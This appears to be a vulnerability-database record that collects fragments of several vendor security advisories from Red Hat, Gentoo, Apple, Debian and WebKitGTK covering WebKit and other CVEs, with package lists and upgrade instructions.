https://usn.ubuntu.com/4287-1 CVE-2019-14615, CVE-2019-15099, CVE-2019-15291, CVE-2019-16229, CVE-2019-16232, CVE-2019-18683, CVE-2019-18786, CVE-2019-18809, CVE-2019-18885, CVE-2019-19057, CVE-2019-19062, CVE-2019-19063, CVE-2019-19071, CVE-2019-19078, CVE-2019-19082, CVE-2019-19227, CVE-2019-19332, CVE-2019-19767, CVE-2019-19965, CVE-2019-20096, CVE-2019-5108, CVE-2020-7053 . 8) - x86_64 3. Description: The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Bug Fix(es): * RT: update RT source tree to the RHEL-8.2 tree (BZ#1708716) * KVM-RT guest fails boot with emulatorsched (BZ#1712781) * 8 vCPU guest need max latency < 20 us with stress [RT-8.2] (BZ#1757165) * Request nx_huge_pages=N as default value to avoid kvm-rt guest large latency spike [rt-8] (BZ#1788352) * RT: Add rpm Provide of 'kernel' to indicate that this is a kernel package (BZ#1796284) * [RHEL8] RT kernel signed by test certificate and not Red Hat Secure Boot (BZ#1806871) Enhancement(s): * update to the upstream 5.x RT patchset (BZ#1680161) 4
var-202010-1510 A type confusion issue was addressed with improved memory handling. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to arbitrary code execution. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the optimization of calls to String.prototype.replace. By performing actions in JavaScript, an attacker can trigger a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Apple Safari is a web browser of Apple (Apple), the default browser included with Mac OS X and iOS operating systems. 8) - aarch64, ppc64le, s390x, x86_64 3. The following packages have been upgraded to a later upstream version: accountsservice (0.6.55), webkit2gtk3 (2.30.4). Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.4 Release Notes linked from the References section. Bugs fixed (https://bugzilla.redhat.com/): 837035 - Shortcuts -- alfanumeric vs numpad 1152037 - RFE: use virtio-scsi disk bus with discard='unmap' for guests that support it 1464902 - Crash in dls_async_task_complete 1671761 - Adding new workspaces is broken in gnome session under wayland 1700002 - adding several printers is stalling the printer plugin in GSD 1705392 - Changing screen resolution while recording screen will break the video. 1728632 - CVE-2019-13012 glib2: insecure permissions for files and directories 1728896 - glib2: 'keyfile' backend for gsettings not loaded 1765627 - Can't install both gnome-online-accounts-devel.i686 and gnome-online-accounts-devel.x86_64 on RHEL 8.1 1786496 - gnome-shell killed by SIGABRT in g_assertion_message_expr.cold.16() 1796916 - Notification appears with incorrect "system not registered - register to get updates" message on RHEL8.2 when locale is non-English 1802105 - rpm based extensions in RHEL8 should not receive updates from extensions.gnome.org 1833787 - Unable to disable onscreen keyboard in touch screen machine 1842229 - double-touch desktop icons fails sometimes 1845660 - JS WARNING from gnome-shell [MetaWindowX11] 1846376 - rebase accountsservice to latest release 1854290 - Physical device fails to wakeup via org.gnome.ScreenSaver D-Bus API 1860946 - gnome-shell logs AuthList property defined with 'let' or 'const' 1861357 - Login shows Exclamation Sign with no message for Caps Lock on 1861769 - Authentication fails when Wayland is enabled along with polyinstantiation of /tmp 1865718 - Right click menu is not translated into Japanese when desktop-icons extension is enabled 1870837 - gnome control-center and settings-daemon don't handle systems that are registered but have no attached entitlements properly 1871041 - on screen keyboard (OSK) does not disappear completely, part of OSK remains on the screen 1876291 - [ALL LANG] Unlocalized strings in About -> Register System. 1881312 - [Bug] gnome-shell errors in syslog 1883304 - Rebase to WebKitGTK 2.30 1883868 - [RFE] Dump JS stack trace by default when gnome-shell crashes 1886822 - License differs from actual 1888407 - Flatpak updates and removals get confused if same ref occurs in multiple remotes 1889411 - self-signed cert in owncloud: HTTP Error: Unacceptable TLS certificate 1889528 - [8.4] Right GLX stereo texture is potentially leaked for each closed window 1901212 - CVE-2020-13584 webkitgtk: use-after-free may lead to arbitrary code execution 1901214 - CVE-2020-9948 webkitgtk: type confusion may lead to arbitrary code execution 1901216 - CVE-2020-9951 webkitgtk: use-after-free may lead to arbitrary code execution 1901221 - CVE-2020-9983 webkitgtk: out-of-bounds write may lead to code execution 1903043 - gnome-control-center SEGFAULT at ../panels/printers/pp-printer-entry.c:280 1903568 - CVE-2020-13543 webkitgtk: use-after-free may lead to arbitrary code execution 1906499 - Nautilus creates invalid bookmarks for Samba shares 1918391 - gdm isn't killing the login screen on login after all 1919429 - Ship libdazzle-devel in CRB 1919432 - Ship libepubgen-devel in CRB 1919435 - Ship woff2-devel in CRB 1919467 - Mutter: mouse click doesn't work when using 10-bit graphic monitor 1921151 - [nvidia Ampere] stutters when using nouveau with llvmpipe 6. 8): Source: gamin-0.1.10-32.el8.src.rpm glib2-2.56.4-9.el8.src.rpm aarch64: gamin-0.1.10-32.el8.aarch64.rpm gamin-debuginfo-0.1.10-32.el8.aarch64.rpm gamin-debugsource-0.1.10-32.el8.aarch64.rpm glib2-2.56.4-9.el8.aarch64.rpm glib2-debuginfo-2.56.4-9.el8.aarch64.rpm glib2-debugsource-2.56.4-9.el8.aarch64.rpm glib2-devel-2.56.4-9.el8.aarch64.rpm glib2-devel-debuginfo-2.56.4-9.el8.aarch64.rpm glib2-fam-2.56.4-9.el8.aarch64.rpm glib2-fam-debuginfo-2.56.4-9.el8.aarch64.rpm glib2-tests-2.56.4-9.el8.aarch64.rpm glib2-tests-debuginfo-2.56.4-9.el8.aarch64.rpm ppc64le: gamin-0.1.10-32.el8.ppc64le.rpm gamin-debuginfo-0.1.10-32.el8.ppc64le.rpm gamin-debugsource-0.1.10-32.el8.ppc64le.rpm glib2-2.56.4-9.el8.ppc64le.rpm glib2-debuginfo-2.56.4-9.el8.ppc64le.rpm glib2-debugsource-2.56.4-9.el8.ppc64le.rpm glib2-devel-2.56.4-9.el8.ppc64le.rpm glib2-devel-debuginfo-2.56.4-9.el8.ppc64le.rpm glib2-fam-2.56.4-9.el8.ppc64le.rpm glib2-fam-debuginfo-2.56.4-9.el8.ppc64le.rpm glib2-tests-2.56.4-9.el8.ppc64le.rpm glib2-tests-debuginfo-2.56.4-9.el8.ppc64le.rpm s390x: gamin-0.1.10-32.el8.s390x.rpm gamin-debuginfo-0.1.10-32.el8.s390x.rpm gamin-debugsource-0.1.10-32.el8.s390x.rpm glib2-2.56.4-9.el8.s390x.rpm glib2-debuginfo-2.56.4-9.el8.s390x.rpm glib2-debugsource-2.56.4-9.el8.s390x.rpm glib2-devel-2.56.4-9.el8.s390x.rpm glib2-devel-debuginfo-2.56.4-9.el8.s390x.rpm glib2-fam-2.56.4-9.el8.s390x.rpm glib2-fam-debuginfo-2.56.4-9.el8.s390x.rpm glib2-tests-2.56.4-9.el8.s390x.rpm glib2-tests-debuginfo-2.56.4-9.el8.s390x.rpm x86_64: gamin-0.1.10-32.el8.i686.rpm gamin-0.1.10-32.el8.x86_64.rpm gamin-debuginfo-0.1.10-32.el8.i686.rpm gamin-debuginfo-0.1.10-32.el8.x86_64.rpm gamin-debugsource-0.1.10-32.el8.i686.rpm gamin-debugsource-0.1.10-32.el8.x86_64.rpm glib2-2.56.4-9.el8.i686.rpm glib2-2.56.4-9.el8.x86_64.rpm glib2-debuginfo-2.56.4-9.el8.i686.rpm glib2-debuginfo-2.56.4-9.el8.x86_64.rpm glib2-debugsource-2.56.4-9.el8.i686.rpm glib2-debugsource-2.56.4-9.el8.x86_64.rpm glib2-devel-2.56.4-9.el8.i686.rpm glib2-devel-2.56.4-9.el8.x86_64.rpm glib2-devel-debuginfo-2.56.4-9.el8.i686.rpm glib2-devel-debuginfo-2.56.4-9.el8.x86_64.rpm glib2-fam-2.56.4-9.el8.x86_64.rpm glib2-fam-debuginfo-2.56.4-9.el8.i686.rpm glib2-fam-debuginfo-2.56.4-9.el8.x86_64.rpm glib2-tests-2.56.4-9.el8.x86_64.rpm glib2-tests-debuginfo-2.56.4-9.el8.i686.rpm glib2-tests-debuginfo-2.56.4-9.el8.x86_64.rpm Red Hat CodeReady Linux Builder (v. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: Red Hat OpenShift Container Storage 4.6.5 security and bug fix update Advisory ID: RHSA-2021:2479-01 Product: Red Hat OpenShift Container Storage Advisory URL: https://access.redhat.com/errata/RHSA-2021:2479 Issue date: 2021-06-17 CVE Names: CVE-2016-10228 CVE-2017-14502 CVE-2019-2708 CVE-2019-3842 CVE-2019-9169 CVE-2019-13012 CVE-2019-14866 CVE-2019-25013 CVE-2020-8231 CVE-2020-8284 CVE-2020-8285 CVE-2020-8286 CVE-2020-8927 CVE-2020-9948 CVE-2020-9951 CVE-2020-9983 CVE-2020-13434 CVE-2020-13543 CVE-2020-13584 CVE-2020-13776 CVE-2020-15358 CVE-2020-24977 CVE-2020-25659 CVE-2020-25678 CVE-2020-26116 CVE-2020-26137 CVE-2020-27618 CVE-2020-27619 CVE-2020-27783 CVE-2020-28196 CVE-2020-29361 CVE-2020-29362 CVE-2020-29363 CVE-2020-36242 CVE-2021-3139 CVE-2021-3177 CVE-2021-3326 CVE-2021-3449 CVE-2021-3450 CVE-2021-3528 CVE-2021-20305 CVE-2021-23239 CVE-2021-23240 CVE-2021-23336 ==================================================================== 1. Summary: Updated images that fix one security issue and several bugs are now available for Red Hat OpenShift Container Storage 4.6.5 on Red Hat Enterprise Linux 8 from Red Hat Container Registry. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Description: Red Hat OpenShift Container Storage is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Container Storage is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Container Storage provisions a multicloud data management service with an S3 compatible API. Security Fix(es): * NooBaa: noobaa-operator leaking RPC AuthToken into log files (CVE-2021-3528) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Bug Fix(es): * Currently, a newly restored PVC cannot be mounted if some of the OpenShift Container Platform nodes are running on a version of Red Hat Enterprise Linux which is less than 8.2, and the snapshot from which the PVC was restored is deleted. Workaround: Do not delete the snapshot from which the PVC was restored until the restored PVC is deleted. (BZ#1962483) * Previously, the default backingstore was not created on AWS S3 when OpenShift Container Storage was deployed, due to incorrect identification of AWS S3. With this update, the default backingstore gets created when OpenShift Container Storage is deployed on AWS S3. (BZ#1927307) * Previously, log messages were printed to the endpoint pod log even if the debug option was not set. With this update, the log messages are printed to the endpoint pod log only when the debug option is set. (BZ#1938106) * Previously, the PVCs could not be provisioned as the `rook-ceph-mds` did not register the pod IP on the monitor servers, and hence every mount on the filesystem timed out, resulting in CephFS volume provisioning failure. With this update, an argument `--public-addr=podIP` is added to the MDS pod when the host network is not enabled, and hence the CephFS volume provisioning does not fail. (BZ#1949558) * Previously, OpenShift Container Storage 4.2 clusters were not updated with the correct cache value, and hence MDSs in standby-replay might report an oversized cache, as rook did not apply the `mds_cache_memory_limit` argument during upgrades. With this update, the `mds_cache_memory_limit` argument is applied during upgrades and the mds daemon operates normally. (BZ#1951348) * Previously, the coredumps were not generated in the correct location as rook was setting the config option `log_file` to an empty string since logging happened on stdout and not on the files, and hence Ceph read the value of the `log_file` to build the dump path. With this update, rook does not set the `log_file` and keeps Ceph's internal default, and hence the coredumps are generated in the correct location and are accessible under `/var/log/ceph/`. (BZ#1938049) * Previously, Ceph became inaccessible, as the mons lose quorum if a mon pod was drained while another mon was failing over. With this update, voluntary mon drains are prevented while a mon is failing over, and hence Ceph does not become inaccessible. (BZ#1946573) * Previously, the mon quorum was at risk, as the operator could erroneously remove the new mon if the operator was restarted during a mon failover. With this update, the operator completes the same mon failover after the operator is restarted, and hence the mon quorum is more reliable in the node drains and mon failover scenarios. (BZ#1959983) All users of Red Hat OpenShift Container Storage are advised to pull these new images from the Red Hat Container Registry. 3. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258 4. Bugs fixed (https://bugzilla.redhat.com/): 1938106 - [GSS][RFE]Reduce debug level for logs of Nooba Endpoint pod 1950915 - XSS Vulnerability with Noobaa version 5.5.0-3bacc6b 1951348 - [GSS][CephFS] health warning "MDS cache is too large (3GB/1GB); 0 inodes in use by clients, 0 stray files" for the standby-replay 1951600 - [4.6.z][Clone of BZ #1936545] setuid and setgid file bits are not retained after a OCS CephFS CSI restore 1955601 - CVE-2021-3528 NooBaa: noobaa-operator leaking RPC AuthToken into log files 1957189 - [Rebase] Use RHCS4.2z1 container image with OCS 4..6.5[may require doc update for external mode min supported RHCS version] 1959980 - When a node is being drained, increase the mon failover timeout to prevent unnecessary mon failover 1959983 - [GSS][mon] rook-operator scales mons to 4 after healthCheck timeout 1962483 - [RHEL7][RBD][4.6.z clone] FailedMount error when using restored PVC on app pod 5. References: https://access.redhat.com/security/cve/CVE-2016-10228 https://access.redhat.com/security/cve/CVE-2017-14502 https://access.redhat.com/security/cve/CVE-2019-2708 https://access.redhat.com/security/cve/CVE-2019-3842 https://access.redhat.com/security/cve/CVE-2019-9169 https://access.redhat.com/security/cve/CVE-2019-13012 https://access.redhat.com/security/cve/CVE-2019-14866 https://access.redhat.com/security/cve/CVE-2019-25013 https://access.redhat.com/security/cve/CVE-2020-8231 https://access.redhat.com/security/cve/CVE-2020-8284 https://access.redhat.com/security/cve/CVE-2020-8285 https://access.redhat.com/security/cve/CVE-2020-8286 https://access.redhat.com/security/cve/CVE-2020-8927 https://access.redhat.com/security/cve/CVE-2020-9948 https://access.redhat.com/security/cve/CVE-2020-9951 https://access.redhat.com/security/cve/CVE-2020-9983 https://access.redhat.com/security/cve/CVE-2020-13434 https://access.redhat.com/security/cve/CVE-2020-13543 https://access.redhat.com/security/cve/CVE-2020-13584 https://access.redhat.com/security/cve/CVE-2020-13776 https://access.redhat.com/security/cve/CVE-2020-15358 https://access.redhat.com/security/cve/CVE-2020-24977 https://access.redhat.com/security/cve/CVE-2020-25659 https://access.redhat.com/security/cve/CVE-2020-25678 https://access.redhat.com/security/cve/CVE-2020-26116 https://access.redhat.com/security/cve/CVE-2020-26137 https://access.redhat.com/security/cve/CVE-2020-27618 https://access.redhat.com/security/cve/CVE-2020-27619 https://access.redhat.com/security/cve/CVE-2020-27783 https://access.redhat.com/security/cve/CVE-2020-28196 https://access.redhat.com/security/cve/CVE-2020-29361 https://access.redhat.com/security/cve/CVE-2020-29362 https://access.redhat.com/security/cve/CVE-2020-29363 https://access.redhat.com/security/cve/CVE-2020-36242 https://access.redhat.com/security/cve/CVE-2021-3139 https://access.redhat.com/security/cve/CVE-2021-3177 https://access.redhat.com/security/cve/CVE-2021-3326 https://access.redhat.com/security/cve/CVE-2021-3449 https://access.redhat.com/security/cve/CVE-2021-3450 https://access.redhat.com/security/cve/CVE-2021-3528 https://access.redhat.com/security/cve/CVE-2021-20305 https://access.redhat.com/security/cve/CVE-2021-23239 https://access.redhat.com/security/cve/CVE-2021-23240 https://access.redhat.com/security/cve/CVE-2021-23336 https://access.redhat.com/security/updates/classification/#moderate 6. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYMtu/9zjgjWX9erEAQh6fhAAm9UPxF0e8ubzCEae+bkQAduwCkzpQ0ND Q1/UcDAAc4ueEhBrwXPhOLrgfBj+VG+QA19YZcNPzbW7I48RGjCm5WccnUyEbFAo FKTspCZW7FkXKBU15u58c/sFCGa4/Yuu+IpqCMuZ6lR2g9WHIBKdVtaB4y59AyfS v59cAorqZ3AoTX4lVys6HfDGySQWlg5P8t6ST72cUJjESi6U0HV00P7ECU2SFxCF HXA4gbXbZ1EPb/1+UkRRnXemJuT8SaRFRTrzj9woTrVAGQFvn+yjxLbZxVZb0WDd 6QeNpiJNICfL+/ExvEmGQucf7NcekYPWud11pnRUfQ+Uqsj+I7YoaepXAAolLzvN kAVVpFNsWADOVz7BrfSKoo4b38UCFOEUSd2d1ijCNE96Q9XyNUpn+kZqz0/wpBQC L+E5N9kEuaLyDBoI0wJAfoqU1NY4Cvl6lIMDgHUv2CE10zxhFwHCDulAfcQgxNQG sIbpSgSegq9HfZSDxa6Rtrox1I7oGhnBy10sIwUUH1+fxAusUk+Xrxf8hUv8KgDz V144yrGwN/6KVxh74A60bJX3ai12l6fC8bkmsxg5K1r/Dk4tUkQeXNdBbaK/rEKO AQs7YDab/0VA2qKtXDRkbnzqBRSbamDNOO/jd28nGMoclaIRHCzQgJRFv6Qb6dwT RCrstqAM5QQ=DHD0 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . See the following advisory for the RPM packages for this release: https://access.redhat.com/errata/RHSA-2021:2122 Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes: https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html This update fixes the following bug among others: * Previously, resources for the ClusterOperator were being created early in the update process, which led to update failures when the ClusterOperator had no status condition while Operators were updating. This bug fix changes the timing of when these resources are created. As a result, updates can take place without errors. (BZ#1959238) Security Fix(es): * gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121) You may download the oc tool and use it to inspect release image metadata as follows: (For x86_64 architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-x86_64 The image digest is sha256:783a2c963f35ccab38e82e6a8c7fa954c3a4551e07d2f43c06098828dd986ed4 (For s390x architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-s390x The image digest is sha256:4cf44e68413acad063203e1ee8982fd01d8b9c1f8643a5b31cd7ff341b3199cd (For ppc64le architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-ppc64le The image digest is sha256:d47ce972f87f14f1f3c5d50428d2255d1256dae3f45c938ace88547478643e36 All OpenShift Container Platform 4.7 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -between-minor.html#understanding-upgrade-channels_updating-cluster-between - -minor 3. Solution: For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update: https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -cli.html 4. Bugs fixed (https://bugzilla.redhat.com/): 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1923268 - [Assisted-4.7] [Staging] Using two both spelling "canceled" "cancelled" 1947216 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go 1953963 - Enable/Disable host operations returns cluster resource with incomplete hosts list 1957749 - ovn-kubernetes pod should have CPU and memory requests set but not limits 1959238 - CVO creating cloud-controller-manager too early causing upgrade failures 1960103 - SR-IOV obliviously reboot the node 1961941 - Local Storage Operator using LocalVolume CR fails to create PV's when backend storage failure is simulated 1962302 - packageserver clusteroperator does not set reason or message for Available condition 1962312 - Deployment considered unhealthy despite being available and at latest generation 1962435 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone 1963115 - Test verify /run filesystem contents failing 5. Bugs fixed (https://bugzilla.redhat.com/): 1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve 1945703 - "Guest OS Info" availability in VMI describe is flaky 1958816 - [2.6.z] KubeMacPool fails to start due to OOM likely caused by a high number of Pods running in the cluster 1963275 - migration controller null pointer dereference 1965099 - Live Migration double handoff to virt-handler causes connection failures 1965181 - CDI importer doesn't report AwaitingVDDK like it used to 1967086 - Cloning DataVolumes between namespaces fails while creating cdi-upload pod 1967887 - [2.6.6] nmstate is not progressing on a node and not configuring vlan filtering that causes an outage for VMs 1969756 - Windows VMs fail to start on air-gapped environments 1970372 - Virt-handler fails to verify container-disk 1973227 - segfault in virt-controller during pdb deletion 1974084 - 2.6.6 containers 1975212 - No Virtual Machine Templates Found [EDIT - all templates are marked as depracted] 1975727 - [Regression][VMIO][Warm] The third precopy does not end in warm migration 1977756 - [2.6.z] PVC keeps in pending when using hostpath-provisioner 1982760 - [v2v] no kind VirtualMachine is registered for version \"kubevirt.io/v1\" i... 1986989 - OpenShift Virtualization 2.6.z cannot be upgraded to 4.8.0 initially deployed starting with <= 4.8 5. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202012-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: WebkitGTK+: Multiple vulnerabilities Date: December 23, 2020 Bugs: #755947 ID: 202012-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in WebKitGTK+, the worst of which could result in the arbitrary execution of code. Background ========== WebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-libs/webkit-gtk < 2.30.3 >= 2.30.3 Description =========== Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All WebkitGTK+ users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.30.3" References ========== [ 1 ] CVE-2020-13543 https://nvd.nist.gov/vuln/detail/CVE-2020-13543 [ 2 ] CVE-2020-13584 https://nvd.nist.gov/vuln/detail/CVE-2020-13584 [ 3 ] CVE-2020-9948 https://nvd.nist.gov/vuln/detail/CVE-2020-9948 [ 4 ] CVE-2020-9951 https://nvd.nist.gov/vuln/detail/CVE-2020-9951 [ 5 ] CVE-2020-9952 https://nvd.nist.gov/vuln/detail/CVE-2020-9952 [ 6 ] CVE-2020-9983 https://nvd.nist.gov/vuln/detail/CVE-2020-9983 [ 7 ] WSA-2020-0008 https://webkitgtk.org/security/WSA-2020-0008.html [ 8 ] WSA-2020-0009 https://webkitgtk.org/security/WSA-2020-0009.html Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/202012-10 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2020 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2020-11-13-5 Additional information for APPLE-SA-2020-09-16-3 Safari 14.0 Safari 14.0 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT211845. Safari Available for: macOS Catalina and macOS Mojave, and included in macOS Big Sur Impact: Visiting a malicious website may lead to address bar spoofing Description: The issue was addressed with improved UI handling. CVE-2020-9993: Masato Sugiyama (@smasato) of University of Tsukuba, Piotr Duszynski Entry added November 12, 2020 Safari Available for: macOS Catalina and macOS Mojave, and included in macOS Big Sur Impact: Visiting a malicious website may lead to address bar spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2020-9948: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative WebKit Available for: macOS Catalina and macOS Mojave, and included in macOS Big Sur Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2020-9947: cc working with Trend Micro Zero Day Initiative CVE-2020-9950: cc working with Trend Micro Zero Day Initiative CVE-2020-9951: Marcin 'Icewall' Noga of Cisco Talos Entry updated November 12, 2020 WebKit Available for: macOS Catalina and macOS Mojave Impact: Processing maliciously crafted web content may lead to a cross site scripting attack Description: An input validation issue was addressed with improved input validation. CVE-2020-9983: zhunki Additional recognition Safari We would like to acknowledge @PaulosYibelo of Limehats, Ryan Pickren (ryanpickren.com) for their assistance. Entry added November 12, 2020 Safari Reader We would like to acknowledge Zhiyang Zeng(@Wester) of OPPO ZIWU Security Lab for their assistance. Entry added November 12, 2020 WebKit We would like to acknowledge Pawel Wylecial of REDTEAM.PL, Ryan Pickren (ryanpickren.com), Tsubasa FUJII (@reinforchu), Zhiyang Zeng(@Wester) of OPPO ZIWU Security Lab for their assistance. Entry added November 12, 2020 Installation note: Safari 14.0 may be obtained from the Mac App Store. For the stable distribution (buster), these problems have been fixed in version 2.30.3-1~deb10u1. We recommend that you upgrade your webkit2gtk packages
var-201904-1433 A memory corruption issue was addressed with improved validation. This issue affected versions prior to iOS 12.1, tvOS 12.1, watchOS 5.1, Safari 12.0.1, iTunes 12.9.1, iCloud for Windows 7.8. Apple Has released an update for each product.The expected impact depends on each vulnerability, but can be affected as follows: Detail is Apple See the information provided by. * HTTP Through the client AFP Server attack * Arbitrary code execution * information leak * Buffer overflow * Privilege escalation * Service operation interruption (DoS) * File system tampering * UI Spoofing * Limit avoidance * Cross-site scripting * Address bar impersonation. plural Apple The product has a memory corruption vulnerability due to a lack of validation.The memory may be damaged. Apple Safari, etc. are all products of Apple (Apple). Apple Safari is a web browser that is the default browser included with the Mac OS X and iOS operating systems. Apple iOS is an operating system developed for mobile devices. Apple tvOS is a smart TV operating system. WebKit is one of the web browser engine components. A buffer error vulnerability exists in the WebKit component of several Apple products. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to execute arbitrary code on the system. Alternatively, on your watch, select "My Watch > General > About". CVE-2018-4378: an anonymous researcher, zhunki of 360 ESG Codesafe Team Installation note: Safari 12.0.1 may be obtained from the Mac App Store. ------------------------------------------------------------------------ WebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0008 ------------------------------------------------------------------------ Date reported : November 21, 2018 Advisory ID : WSA-2018-0008 WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2018-0008.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2018-0008.html CVE identifiers : CVE-2018-4345, CVE-2018-4372, CVE-2018-4373, CVE-2018-4375, CVE-2018-4376, CVE-2018-4378, CVE-2018-4382, CVE-2018-4386, CVE-2018-4392, CVE-2018-4416. Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit. CVE-2018-4345 Versions affected: WebKitGTK+ before 2.22.3 and WPE WebKit before 2.22.1. Credit to an anonymous researcher. A cross-site scripting issue existed in WebKit. CVE-2018-4372 Versions affected: WebKitGTK+ before 2.22.4 and WPE WebKit before 2.22.2. Credit to HyungSeok Han, DongHyeon Oh, and Sang Kil Cha of KAIST Softsec Lab, Korea. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4373 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to ngg, alippai, DirtYiCE, KT of Tresorit working with Trend Microys Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4375 Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0. Credit to Yu Haiwan and Wu Hongjun From Nanyang Technological University working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4376 Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0. Credit to 010 working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4378 Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0. Credit to an anonymous researcher, zhunki of 360 ESG Codesafe Team. Processing maliciously crafted web content may lead to code execution. CVE-2018-4382 Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0. Credit to lokihardt of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4386 Versions affected: WebKitGTK+ before 2.22.3 and WPE WebKit before 2.22.1. Credit to lokihardt of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4392 Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0. Credit to zhunki of 360 ESG Codesafe Team. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4416 Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0. Credit to lokihardt of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. We recommend updating to the latest stable versions of WebKitGTK+ and WPE WebKit. It is the best way to ensure that you are running safe versions of WebKit. Please check our websites for information about the latest stable releases. Further information about WebKitGTK+ and WPE WebKit security advisories can be found at: https://webkitgtk.org/security.html or https://wpewebkit.org/security/. The WebKitGTK+ and WPE WebKit team, November 21, 2018 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2018-10-30-1 iOS 12.1 iOS 12.1 is now available and addresses the following: AppleAVD Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing malicious video via FaceTime may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4384: Natalie Silvanovich of Google Project Zero Contacts Available for: iPhone 5s and later, 